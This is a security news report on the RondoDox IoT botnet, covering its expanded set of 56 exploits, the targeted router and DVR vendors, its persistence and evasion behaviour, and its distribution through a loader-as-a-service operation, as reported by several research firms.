RondoDox IoT botnet swells to 56 exploits in shotgun campaign

Multiple security researchers have detailed a large escalation in the RondoDox Internet of Things (IoT) botnet campaign, which now weaponises 56 vulnerabilities across more than 30 vendors after initially targeting just two flaws.

Security vendor Trend Micro's Zero Day Initiative and research teams reported that active exploitation has been observed globally since mid-2025, with several vulnerabilities now included in the United States Cybersecurity and Infrastructure Security Agency's Known Exploited Vulnerabilities (CISA KEV) catalogue.

The initial RondoDox analysis, published by FortiGuard Labs earlier this year, identified the botnet exploiting two vulnerabilities, CVE-2024-3721 in TBK DVR devices and CVE-2024-12856 in Four-Faith routers.

RondoDox operators have now adopted what Trend Micro describes as an "exploit shotgun" approach, firing off multiple exploits to see which ones successfully compromise targets.

Their expanded arsenal includes 50 command injection flaws, two path traversal flaws, and instances of buffer overflow, authentication bypass, and memory corruption vulnerabilities.

Legacy vulnerabilities feature prominently, including the decade-old Shellshock bug (CVE-2014-6271) from 2014 and multiple flaws in end-of-life devices.

Eighteen (18) of the targeted flaws are without assigned CVE identifiers, while 38 have been formally catalogued.

Trend Micro's first RondoDox intrusion attempt was detected on June 15 2025, exploiting CVE-2023-1389 in the TP-Link Archer AX21 router's wide area network (WAN) interface.

That vulnerability was originally demonstrated at Pwn2Own Toronto in December 2022 by researchers Tri Dang and Bien Pham from Qrious Secure, who exploited authentication bypass and command injection flaws in the TP-Link AX1800 device.

It was reported to TP-Link on January 15 2023, but has now resurfaced in the RondoDox campaign more than two years later.

FortiGuard Labs' earlier analysis suggested that RondoDox employs XOR encoding to obfuscate its configuration data.

It also mimics legitimate traffic from gaming platforms and VPN services to evade detection.

The malware disguises itself as traffic from gaming platforms Valve, Minecraft, Roblox, Fortnite, comms tool Discord, along with the OpenVPN and WireGuard and other popular services.

RondoDox establishes multiple persistence mechanisms to maintain presence on compromised systems, even if individual components are detected and removed.

The malware modifies system startup files including /etc/rcS, /etc/init.d/rcS, and /etc/inittab, whilst also creating crontab entries for both user and root accounts.

It actively terminates competing malware and analysis tools, scanning for processes related to cryptocurrency miners, network utilities like Wireshark, and debugging tools such as gdb.

The malware also renames critical system executables to random character strings, disrupting firewall configuration, user account management, and shutdown operations.

RondoDox is also being distributed through a loader-as-a-service (LaaS) infrastructure that packages it alongside Mirai and Morte payloads.

CloudSEK researchers discovered the operation through exposed command and control logs spanning six months, and reported a 230 percent attack spike for the campaign between July and August 2025.

The LaaS model employs a sophisticated botnet panel that processes requests through specific modules, with markers including ReplyPageLogin for authentication attempts, ConfigSystemCommand for injection staging, and ReplySuccessPage for successful payload delivery.

Attack vectors focus on command injection via unsanitised POST parameters in fields such as network time protocol (NTP), syslog, hostname, and ping configurations within web interfaces of routers and embedded devices.

The LaaS campaign has expanded beyond consumer devices to target enterprise applications including Oracle WebLogic servers through remote code execution vulnerabilities, alongside known flaws in WordPress and vBulletin systems, CloudSek said.

Multiple Linux architectures including Intel 80386, MC68000, MIPS R3000, PowerPC, SuperH, ARCompact, x86-64, and AArch64 are now supported by the malware.

The vulnerability list spans networking equipment from D-Link, Netgear, TP-Link, Cisco, TOTOLINK, and Zyxel, alongside DVR and NVR systems from TBK, TVT, LILIN, and AVTECH.